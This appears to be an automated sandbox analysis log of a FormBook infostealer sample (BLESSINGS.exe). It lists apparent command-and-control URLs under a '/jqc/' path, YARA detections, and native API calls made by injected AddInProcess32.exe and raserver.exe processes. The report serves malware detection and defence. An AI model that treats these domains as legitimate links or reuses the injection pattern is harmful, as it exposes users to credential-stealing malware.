          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.downloadReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com/jqc/www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/www.hotvidzhub.download
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/www.novergi.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lande
          Source: BLESSINGS.exe, 00000001.00000002.422231496.0000000001180000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419D60 NtCreateFile,8_2_00419D60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E10 NtReadFile,8_2_00419E10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E90 NtClose,8_2_00419E90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419F40 NtAllocateVirtualMemory,8_2_00419F40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419D5D NtCreateFile,8_2_00419D5D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E0B NtReadFile,8_2_00419E0B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E8A NtClose,8_2_00419E8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419F3A NtAllocateVirtualMemory,8_2_00419F3A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_01779910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017799A0 NtCreateSection,LdrInitializeThunk,8_2_017799A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,8_2_01779860
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779840 NtDelayExecution,LdrInitializeThunk,8_2_01779840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,8_2_017798F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A50 NtCreateFile,LdrInitializeThunk,8_2_01779A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A20 NtResumeThread,LdrInitializeThunk,8_2_01779A20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,8_2_01779A00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779540 NtReadFile,LdrInitializeThunk,8_2_01779540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017795D0 NtClose,LdrInitializeThunk,8_2_017795D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779710 NtQueryInformationToken,LdrInitializeThunk,8_2_01779710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,8_2_017797A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779780 NtMapViewOfSection,LdrInitializeThunk,8_2_01779780
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_01779660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_017796E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779950 NtQueueApcThread,8_2_01779950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017799D0 NtCreateProcessEx,8_2_017799D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177B040 NtSuspendThread,8_2_0177B040
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779820 NtEnumerateKey,8_2_01779820
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017798A0 NtWriteVirtualMemory,8_2_017798A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779B00 NtSetValueKey,8_2_01779B00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A3B0 NtGetContextThread,8_2_0177A3B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A10 NtQuerySection,8_2_01779A10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A80 NtOpenDirectoryObject,8_2_01779A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779560 NtWriteFile,8_2_01779560
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177AD30 NtSetContextThread,8_2_0177AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779520 NtWaitForSingleObject,8_2_01779520
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017795F0 NtQueryInformationFile,8_2_017795F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A770 NtOpenThread,8_2_0177A770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779770 NtSetInformationFile,8_2_01779770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779760 NtOpenProcess,8_2_01779760
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779730 NtQueryVirtualMemory,8_2_01779730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A710 NtOpenProcessToken,8_2_0177A710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779FE0 NtCreateMutant,8_2_01779FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779670 NtQueryInformationProcess,8_2_01779670
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779650 NtQueryValueKey,8_2_01779650
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779610 NtEnumerateValueKey,8_2_01779610
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017796D0 NtCreateKey,8_2_017796D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569840 NtDelayExecution,LdrInitializeThunk,15_2_04569840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04569860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569540 NtReadFile,LdrInitializeThunk,15_2_04569540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04569910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045695D0 NtClose,LdrInitializeThunk,15_2_045695D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045699A0 NtCreateSection,LdrInitializeThunk,15_2_045699A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569650 NtQueryValueKey,LdrInitializeThunk,15_2_04569650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A50 NtCreateFile,LdrInitializeThunk,15_2_04569A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04569660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045696D0 NtCreateKey,LdrInitializeThunk,15_2_045696D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_045696E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569710 NtQueryInformationToken,LdrInitializeThunk,15_2_04569710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569FE0 NtCreateMutant,LdrInitializeThunk,15_2_04569FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569780 NtMapViewOfSection,LdrInitializeThunk,15_2_04569780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456B040 NtSuspendThread,15_2_0456B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569820 NtEnumerateKey,15_2_04569820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045698F0 NtReadVirtualMemory,15_2_045698F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045698A0 NtWriteVirtualMemory,15_2_045698A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569950 NtQueueApcThread,15_2_04569950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569560 NtWriteFile,15_2_04569560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456AD30 NtSetContextThread,15_2_0456AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569520 NtWaitForSingleObject,15_2_04569520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045699D0 NtCreateProcessEx,15_2_045699D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045695F0 NtQueryInformationFile,15_2_045695F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569670 NtQueryInformationProcess,15_2_04569670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569610 NtEnumerateValueKey,15_2_04569610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A10 NtQuerySection,15_2_04569A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A00 NtProtectVirtualMemory,15_2_04569A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A20 NtResumeThread,15_2_04569A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A80 NtOpenDirectoryObject,15_2_04569A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569770 NtSetInformationFile,15_2_04569770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A770 NtOpenThread,15_2_0456A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569760 NtOpenProcess,15_2_04569760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A710 NtOpenProcessToken,15_2_0456A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569B00 NtSetValueKey,15_2_04569B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569730 NtQueryVirtualMemory,15_2_04569730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A3B0 NtGetContextThread,15_2_0456A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045697A0 NtUnmapViewOfSection,15_2_045697A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9D60 NtCreateFile,15_2_001E9D60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E10 NtReadFile,15_2_001E9E10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E90 NtClose,15_2_001E9E90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9F40 NtAllocateVirtualMemory,15_2_001E9F40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9D5D NtCreateFile,15_2_001E9D5D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E0B NtReadFile,15_2_001E9E0B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E8A NtClose,15_2_001E9E8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9F3A NtAllocateVirtualMemory,15_2_001E9F3A
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054609C81_2_054609C8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054610F81_2_054610F8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054622601_2_05462260
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05463A281_2_05463A28
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054626D81_2_054626D8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054548A21_2_054548A2
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054563AB1_2_054563AB
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_011740301_2_01174030
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_01179A691_2_01179A69
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117A5611_2_0117A561
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117BC901_2_0117BC90
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117D7521_2_0117D752
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_011777501_2_01177750
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_011747981_2_01174798
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117EEC21_2_0117EEC2
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117F6C01_2_0117F6C0
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117F6B01_2_0117F6B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_004010308_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D8D28_2_0041D8D2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041E1978_2_0041E197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D3138_2_0041D313
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402D878_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402D908_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409E408_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D63C8_2_0041D63C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409E3F8_2_00409E3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041DF978_2_0041DF97
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041DFAA8_2_0041DFAA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402FB08_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00B620508_2_00B62050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017541208_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173F9008_2_0173F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018020A88_2_018020A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018028EC8_2_018028EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F10028_2_017F1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180E8248_2_0180E824
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A08_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B0908_2_0174B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F03DA8_2_017F03DA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802B288_2_01802B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FDBD28_2_017FDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176EBB08_2_0176EBB0
